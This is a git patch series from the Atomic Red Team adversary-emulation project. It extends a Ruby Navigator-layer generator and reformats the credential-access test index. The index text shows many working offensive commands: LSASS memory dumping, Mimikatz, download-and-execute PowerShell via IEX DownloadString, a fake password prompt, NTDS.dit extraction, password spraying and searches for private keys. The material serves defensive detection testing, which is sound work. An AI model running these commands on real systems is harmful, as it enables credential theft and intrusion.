+    File.write output_layer_path_iaas_gcp,layer_iaas_gcp.to_json
+    File.write output_layer_path_containers,layer_containers.to_json
+    File.write output_layer_path_google_workspace,layer_google_workspace.to_json
+    File.write output_layer_path_azure_ad,layer_azure_ad.to_json
+    File.write output_layer_path_office_365,layer_office_365.to_json
 
     puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path}"
     puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_win}"
     puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_mac}"
     puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_lin}"
+    puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_iaas}"
+    puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_iaas_aws}"
+    puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_iaas_azure}"
+    puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_iaas_gcp}"
+    puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_containers}"
+    puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_google_workspace}"
+    puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_azure_ad}"
+    puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_office_365}"
   end
 end
 

From 9a4ad97b0182fcac6ae77939bfbf5e0ad2589448 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 16 Aug 2021 13:54:34 +0000
Subject: [PATCH 18/39] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/index.yaml | 3562 ++++++++++++++++++------------------
 1 file changed, 1781 insertions(+), 1781 deletions(-)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 17a1436d..a7d4214d 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -61,7 +61,7 @@ credential-access:
           cat #{output_file}
         cleanup_command: 'rm -f #{output_file}
 
-          '
+'
         name: bash
         elevation_required: true
     - name: Access /etc/passwd (Local)
@@ -80,7 +80,7 @@ credential-access:
           cat #{output_file}
         cleanup_command: 'rm -f #{output_file}
 
-          '
+'
         name: sh
   T1557.002:
     technique:
@@ -293,7 +293,7 @@ credential-access:
       description: 'Search through bash history for specifice commands we want to
         capture
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -315,7 +315,7 @@ credential-access:
         command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} >
           #{output_file}
 
-          '
+'
         name: sh
   T1110:
     technique:
@@ -550,7 +550,7 @@ credential-access:
         pod service account, for example) can access sensitive information that might
         include credentials to various services.
 
-        '
+'
       supported_platforms:
       - containers
       input_arguments:
@@ -561,17 +561,17 @@ credential-access:
       dependencies:
       - description: 'kubectl must be installed
 
-          '
+'
         get_prereq_command: 'echo "kubectl must be installed manually"
 
-          '
+'
         prereq_command: 'which kubectl
 
-          '
+'
       executor:
         command: 'kubectl get secrets -n #{namespace}
 
-          '
+'
         name: bash
         elevation_required: false
     - name: Cat the contents of a Kubernetes service account token file
@@ -579,7 +579,7 @@ credential-access:
       description: 'Access the Kubernetes service account access token stored within
         a container in a cluster.
 
-        '
+'
       supported_platforms:
       - linux
       dependency_executor_name: sh
@@ -587,24 +587,24 @@ credential-access:
       - description: Verify docker is installed.
         prereq_command: 'which docker
 
-          '
+'
         get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
           Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
           ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
           echo "Docker installed"; fi
 
-          '
+'
       - description: Verify docker service is running.
         prereq_command: 'sudo systemctl status docker
 
-          '
+'
         get_prereq_command: 'sudo systemctl start docker
 
-          '
+'
       - description: Verify kind is in the path.
         prereq_command: 'which kind
 
-          '
+'
         get_prereq_command: |
           curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64
           chmod +x ./kind
@@ -612,14 +612,14 @@ credential-access:
       - description: Verify kind-atomic-cluster is created
         prereq_command: 'sudo kind get clusters
 
-          '
+'
         get_prereq_command: 'sudo kind create cluster --name atomic-cluster
 
-          '
+'
       - description: Verify kubectl is in path
         prereq_command: 'which kubectl
 
-          '
+'
         get_prereq_command: |
           curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
           chmod +x ./kubectl
@@ -627,19 +627,19 @@ credential-access:
       - description: Verify atomic-pod is running.
         prereq_command: 'kubectl --context kind-atomic-cluster get pods |grep atomic-pod
 
-          '
+'
         get_prereq_command: 'kubectl --context kind-atomic-cluster run atomic-pod
           --image=alpine --command -- sleep infinity
 
-          '
+'
       executor:
         command: 'kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token
 
-          '
+'
         name: sh
         cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-pod
 
-          '
+'
   T1056.004:
     technique:
       external_references:
@@ -741,7 +741,7 @@ credential-access:
       auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33
       description: 'Hooks functions in PowerShell to read TLS Communications
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -757,10 +757,10 @@ credential-access:
       dependencies:
       - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name})
 
-          '
+'
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}"
@@ -846,7 +846,7 @@ credential-access:
       description: 'Using username,password combination from a password dump to login
         over SSH.
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -858,16 +858,16 @@ credential-access:
       dependencies:
       - description: 'Requires SSHPASS
 
-          '
+'
         prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
           1; fi;
 
-          '
+'
         get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] ||
           [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo
           apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
 
-          '
+'
       executor:
         name: bash
         elevation_required: false
@@ -879,7 +879,7 @@ credential-access:
       description: 'Using username,password combination from a password dump to login
         over SSH.
 
-        '
+'
       supported_platforms:
       - macos
       input_arguments:
@@ -891,11 +891,11 @@ credential-access:
       dependencies:
       - description: 'Requires SSHPASS
 
-          '
+'
         prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
           1; fi;
 
-          '
+'
         get_prereq_command: |
           /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
           brew install hudochenkov/sshpass/sshpass
@@ -991,14 +991,14 @@ credential-access:
       executor:
         command: 'python2 laZagne.py all
 
-          '
+'
         elevation_required: true
         name: bash
     - name: Extract passwords with grep
       auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4
       description: 'Extracting credentials from files
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -1010,14 +1010,14 @@ credential-access:
       executor:
         command: 'grep -ri password #{file_path}
 
-          '
+'
         name: sh
     - name: Extracting passwords with findstr
       auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513
       description: 'Extracting Credentials from Files. Upon execution, the contents
         of files that contain the word "password" will be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -1043,7 +1043,7 @@ credential-access:
       description: 'This test looks for .netrc files (which stores github credentials
         in clear text )and dumps its contents if found.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -1107,7 +1107,7 @@ credential-access:
       dependencies:
       - description: 'Microsoft Word must be installed
 
-          '
+'
         prereq_command: |
           try {
             New-Object -COMObject "word.Application" | Out-Null
@@ -1118,7 +1118,7 @@ credential-access:
         get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
           to meet this requirement"
 
-          '
+'
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -1127,7 +1127,7 @@ credential-access:
         cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction
           Ignore
 
-          '
+'
         name: powershell
     - name: Dump credentials from Windows Credential Manager With PowerShell [windows
         Credentials]
@@ -1154,7 +1154,7 @@ credential-access:
         command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1''
           -UseBasicParsing); Get-CredManCreds -Force
 
-          '
+'
   T1555.003:
     technique:
       created: '2020-02-12T18:57:36.041Z'
@@ -1266,11 +1266,11 @@ credential-access:
       dependencies:
       - description: 'Modified Sysinternals must be located at #{file_path}
 
-          '
+'
         prereq_command: 'if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit
           1}
 
-          '
+'
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip"
@@ -1318,10 +1318,10 @@ credential-access:
       dependencies:
       - description: 'LaZagne.exe must exist on disk at specified location (#{lazagne_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{lazagne_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}"
@@ -1386,7 +1386,7 @@ credential-access:
       description: 'Queries to enumerate for credentials in the Registry. Upon execution,
         any registry key containing the word "password" will be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -1404,7 +1404,7 @@ credential-access:
       executor:
         command: 'reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s
 
-          '
+'
         name: command_prompt
   T1003.006:
     technique:
@@ -1521,7 +1521,7 @@ credential-access:
       - description: 'Mimikatz executor must exist on disk and at specified location
           (#{mimikatz_path})
 
-          '
+'
         prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -1878,7 +1878,7 @@ credential-access:
           to apply changes." & return & return  default answer "" with icon 1 with
           hidden answer with title "Software Update"''
 
-          '
+'
         name: bash
     - name: PowerShell - Prompt User for Password
       auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
@@ -2008,7 +2008,7 @@ credential-access:
       - description: 'Mimikatz executor must exist on disk and at specified location
           (#{mimikatz_path})
 
-          '
+'
         prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -2113,26 +2113,26 @@ credential-access:
         files on the Domain Controller. This value can be decrypted with gpp-decrypt
         on Kali Linux.
 
-        '
+'
       supported_platforms:
       - windows
       dependency_executor_name: powershell
       dependencies:
       - description: 'Computer must be domain joined
 
-          '
+'
         prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
           {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Write-Host Joining this computer to a domain must be
           done manually
 
-          '
+'
       executor:
         command: 'findstr /S cpassword %logonserver%\sysvol\*.xml
 
-          '
+'
         name: command_prompt
     - name: GPP Passwords (Get-GPPPassword)
       auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c
@@ -2157,25 +2157,25 @@ credential-access:
       dependencies:
       - description: 'Get-GPPPassword PowerShell Script must exist at #{gpp_script_path}
 
-          '
+'
         prereq_command: 'if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1
           }
 
-          '
+'
         get_prereq_command: |
           New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null
           Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}"
       - description: 'Computer must be domain joined
 
-          '
+'
         prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
           {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Write-Host Joining this computer to a domain must be
           done manually
 
-          '
+'
       executor:
         command: |
           . #{gpp_script_path}
@@ -2348,15 +2348,15 @@ credential-access:
       dependencies:
       - description: 'Computer must be domain joined
 
-          '
+'
         prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
           {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Write-Host Joining this computer to a domain must be
           done manually
 
-          '
+'
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -2526,7 +2526,7 @@ credential-access:
           .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath}
         cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
 
-          '
+'
         name: powershell
         elevation_required: true
     - name: Living off the land Terminal Input Capture on Linux with pam.d
@@ -2545,14 +2545,14 @@ credential-access:
       dependencies:
       - description: 'Checking if pam_tty_audit.so is installed
 
-          '
+'
         prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o  /usr/lib64/security/pam_tty_audit.so''
 
-          '
+'
         get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so
           and recompile, for this test to work"
 
-          '
+'
       supported_platforms:
       - linux
       executor:
@@ -2871,10 +2871,10 @@ credential-access:
       - description: 'Windows Credential Editor must exist on disk at specified location
           (#{wce_exe})
 
-          '
+'
         prereq_command: 'if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -2914,10 +2914,10 @@ credential-access:
       - description: 'ProcDump tool from Sysinternals must exist on disk at specified
           location (#{procdump_exe})
 
-          '
+'
         prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
@@ -2928,7 +2928,7 @@ credential-access:
         command: "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n"
         cleanup_command: 'del "#{output_file}" >nul 2> nul
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Dump LSASS.exe Memory using comsvcs.dll
@@ -2943,10 +2943,10 @@ credential-access:
         command: 'C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll,
           MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
 
-          '
+'
         cleanup_command: 'Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
 
-          '
+'
         name: powershell
         elevation_required: true
     - name: Dump LSASS.exe Memory using direct system calls and API unhooking
@@ -2969,10 +2969,10 @@ credential-access:
       - description: 'Dumpert executable must exist on disk at specified location
           (#{dumpert_exe})
 
-          '
+'
         prereq_command: 'if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
@@ -2981,7 +2981,7 @@ credential-access:
         command: "#{dumpert_exe}\n"
         cleanup_command: 'del C:\windows\temp\dumpert.dmp >nul 2> nul
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Dump LSASS.exe Memory using Windows Task Manager
@@ -3024,10 +3024,10 @@ credential-access:
       dependencies:
       - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe})
 
-          '
+'
         prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
@@ -3044,19 +3044,19 @@ credential-access:
           Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
       - description: 'Lsass dump must exist at specified location (#{input_file})
 
-          '
+'
         prereq_command: 'cmd /c "if not exist #{input_file} (exit /b 1)"
 
-          '
+'
         get_prereq_command: 'Write-Host "Create the lsass dump manually using the
           steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
 
-          '
+'
       executor:
         command: '#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords
           full" exit
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: LSASS read with pypykatz
@@ -3073,35 +3073,35 @@ credential-access:
       dependencies:
       - description: 'Computer must have python 3 installed
 
-          '
+'
         prereq_command: |
           py -3 --version >nul 2>&1
           exit /b %errorlevel%
         get_prereq_command: 'echo "Python 3 must be installed manually"
 
-          '
+'
       - description: 'Computer must have pip installed
 
-          '
+'
         prereq_command: |
           py -3 -m pip --version >nul 2>&1
           exit /b %errorlevel%
         get_prereq_command: 'echo "PIP must be installed manually"
 
-          '
+'
       - description: 'pypykatz must be installed and part of PATH
 
-          '
+'
         prereq_command: |
           pypykatz -h >nul 2>&1
           exit /b %errorlevel%
         get_prereq_command: 'pip install pypykatz
 
-          '
+'
       executor:
         command: 'pypykatz live lsa
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Dump LSASS.exe Memory using Out-Minidump.ps1
@@ -3118,7 +3118,7 @@ credential-access:
           IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
         cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
 
-          '
+'
         name: powershell
         elevation_required: true
     - name: Create Mini Dump of LSASS.exe using ProcDump
@@ -3146,10 +3146,10 @@ credential-access:
       - description: 'ProcDump tool from Sysinternals must exist on disk at specified
           location (#{procdump_exe})
 
-          '
+'
         prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
           Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
@@ -3159,7 +3159,7 @@ credential-access:
         command: "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n"
         cleanup_command: 'del "#{output_file}" >nul 2> nul
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Powershell Mimikatz
@@ -3181,7 +3181,7 @@ credential-access:
         command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}'');
           Invoke-Mimikatz -DumpCreds
 
-          '
+'
         name: powershell
         elevation_required: true
     - name: Dump LSASS with .Net 5 createdump.exe
@@ -3203,15 +3203,15 @@ credential-access:
       dependencies:
       - description: 'Computer must have createdump.exe from .Net 5
 
-          '
+'
         prereq_command: 'if (Test-Path ''#{createdump_exe}'') {exit 0} else {exit
           1}
 
-          '
+'
         get_prereq_command: 'echo ".NET 5 must be installed manually." "For the very
           brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe"
 
-          '
+'
       executor:
         command: |
           echo "Createdump Path #{createdump_exe}"
@@ -3221,7 +3221,7 @@ credential-access:
           & "#{createdump_exe}" -u -f #{output_file} $ID
         cleanup_command: 'del #{output_file}
 
-          '
+'
         name: powershell
         elevation_required: true
     - name: Dump LSASS.exe using imported Microsoft DLLs
@@ -3246,10 +3246,10 @@ credential-access:
       dependencies:
       - description: 'Computer must have xordump.exe
 
-          '
+'
         prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
@@ -3257,7 +3257,7 @@ credential-access:
         command: "#{xordump_exe} -out #{output_file} -x 0x41\n"
         cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore
 
-          '
+'
         name: powershell
         elevation_required: true
   T1557:
@@ -3463,19 +3463,19 @@ credential-access:
       dependencies:
       - description: 'Target must be a Domain Controller
 
-          '
+'
         prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v
           ProductType | findstr LanmanNT
 
-          '
+'
         get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller
           must be done manually
 
-          '
+'
       executor:
         command: 'vssadmin.exe create shadow /for=#{drive_letter}
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Copy NTDS.dit from Volume Shadow Copy
@@ -3502,34 +3502,34 @@ credential-access:
       dependencies:
       - description: 'Target must be a Domain Controller
 
-          '
+'
         prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v
           ProductType | findstr LanmanNT
 
-          '
+'
         get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller
           must be done manually
 
-          '
+'
       - description: 'Volume shadow copy must exist
 
-          '
+'
         prereq_command: 'if not exist #{vsc_name} (exit /b 1)
 
-          '
+'
         get_prereq_command: 'echo Run "Invoke-AtomicTest T1003.003 -TestName ''Create
           Volume Shadow Copy with vassadmin''" to fulfuill this requirement
 
-          '
+'
       - description: 'Extract path must exist
 
-          '
+'
         prereq_command: 'if not exist #{extract_path} (exit /b 1)
 
-          '
+'
         get_prereq_command: 'mkdir #{extract_path}
 
-          '
+'
       executor:
         command: |
           copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
@@ -3561,22 +3561,22 @@ credential-access:
       dependencies:
       - description: 'Target must be a Domain Controller
 
-          '
+'
         prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v
           ProductType | findstr LanmanNT
 
-          '
+'
         get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller
           must be done manually
 
-          '
+'
       executor:
         command: |
           mkdir #{output_folder}
           ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
         cleanup_command: 'rmdir /q /s #{output_folder} >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Create Volume Shadow Copy with WMI
@@ -3595,19 +3595,19 @@ credential-access:
       dependencies:
       - description: 'Target must be a Domain Controller
 
-          '
+'
         prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v
           ProductType | findstr LanmanNT
 
-          '
+'
         get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller
           must be done manually
 
-          '
+'
       executor:
         command: 'wmic shadowcopy call create Volume=#{drive_letter}
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Create Volume Shadow Copy with Powershell
@@ -3771,15 +3771,15 @@ credential-access:
       dependencies:
       - description: 'Check if at least one of the tools are installed on the machine.
 
-          '
+'
         prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
           -v tshark)" ]; then exit 1; else exit 0; fi;
 
-          '
+'
         get_prereq_command: 'echo "Install tcpdump and/or tshark for the test to run.";
           exit 1;
 
-          '
+'
       executor:
         command: |
           tcpdump -c 5 -nnni #{interface}
@@ -3803,15 +3803,15 @@ credential-access:
       dependencies:
       - description: 'Check if at least one of the tools are installed on the machine.
 
-          '
+'
         prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
           -v tshark)" ]; then exit 1; else exit 0; fi;
 
-          '
+'
         get_prereq_command: 'echo "Install tcpdump and/or tshark for the test to run.";
           exit 1;
 
-          '
+'
       executor:
         command: "sudo tcpdump -c 5 -nnni #{interface}    \nif [ -x \"$(command -v
           tshark)\" ]; then sudo tshark -c 5 -i #{interface}; fi;\n"
@@ -3852,14 +3852,14 @@ credential-access:
       - description: 'tshark must be installed and in the default path of "c:\Program
           Files\Wireshark\Tshark.exe".
 
-          '
+'
         prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1}
         get_prereq_command: |
           Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
           Start-Process $env:temp\wireshark_installer.exe /S
       - description: 'npcap must be installed.
 
-          '
+'
         prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1}
         get_prereq_command: |
           Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url}
@@ -3867,7 +3867,7 @@ credential-access:
       executor:
         command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Windows Internal Packet Capture
@@ -4034,10 +4034,10 @@ credential-access:
       dependencies:
       - description: 'Gsecdump must exist on disk at specified location (#{gsecdump_exe})
 
-          '
+'
         prereq_command: 'if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
@@ -4102,7 +4102,7 @@ credential-access:
           C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
         cleanup_command: 'Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
 
-          '
+'
         name: powershell
         elevation_required: true
   T1110.002:
@@ -4270,7 +4270,7 @@ credential-access:
       description: 'Uses PowerShell to install and register a password filter DLL.
         Requires a reboot and administrative privileges.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -4283,14 +4283,14 @@ credential-access:
       - description: 'AtomicPasswordFilter.dll must exist on disk at specified location
           (#{input_dll})
 
-          '
+'
         prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Write-Host "You must provide your own password filter
           dll"
 
-          '
+'
       executor:
         command: |
           $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
@@ -4382,7 +4382,7 @@ credential-access:
       description: 'Creates username and password files then attempts to brute force
         Active Directory accounts on remote host
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -4422,7 +4422,7 @@ credential-access:
       description: 'Attempt to brute force Active Directory domain user on a domain
         controller, via LDAP, with NTLM or Kerberos
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -4472,7 +4472,7 @@ credential-access:
       auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69
       description: 'Attempt to brute force Azure AD user via AzureAD powershell module.
 
-        '
+'
       supported_platforms:
       - azure-ad
       input_arguments:
@@ -4489,13 +4489,13 @@ credential-access:
       dependencies:
       - description: 'AzureAD module must be installed.
 
-          '
+'
         prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Install-Module -Name AzureAD -Force
 
-          '
+'
       executor:
         name: powershell
         elevation_required: false
@@ -4681,13 +4681,13 @@ credential-access:
       dependencies:
       - description: 'List of domain users to password spray must exits at %temp%\users.txt
 
-          '
+'
         prereq_command: 'if not exist %temp%\users.txt (exit /b 1)
 
-          '
+'
         get_prereq_command: 'PathToAtomicsFolder\T1110.003\src\parse_net_users.bat
 
-          '
+'
       executor:
         name: command_prompt
         elevation_required: false
@@ -4695,7 +4695,7 @@ credential-access:
           /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password}
           && @net use /delete %logonserver%\IPC$ > NUL
 
-          '
+'
     - name: Password Spray (DomainPasswordSpray)
       auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b
       description: |
@@ -4794,13 +4794,13 @@ credential-access:
       dependencies:
       - description: 'AzureAD module must be installed.
 
-          '
+'
         prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Install-Module -Name AzureAD -Force
 
-          '
+'
       executor:
         name: powershell
         elevation_required: false
@@ -4967,14 +4967,14 @@ credential-access:
       executor:
         command: 'dir c:\ /b /s .key | findstr /e .key
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Discover Private SSH Keys
       auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878
       description: 'Discover private SSH keys on a macOS or Linux system.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -4990,17 +4990,17 @@ credential-access:
       executor:
         command: 'find #{search_path} -name id_rsa >> #{output_file}
 
-          '
+'
         cleanup_command: 'rm #{output_file}
 
-          '
+'
         name: sh
     - name: Copy Private SSH Keys with CP
       auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3
       description: 'Copy private SSH keys on a Linux system to a staging folder using
         the `cp` command.
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -5018,14 +5018,14 @@ credential-access:
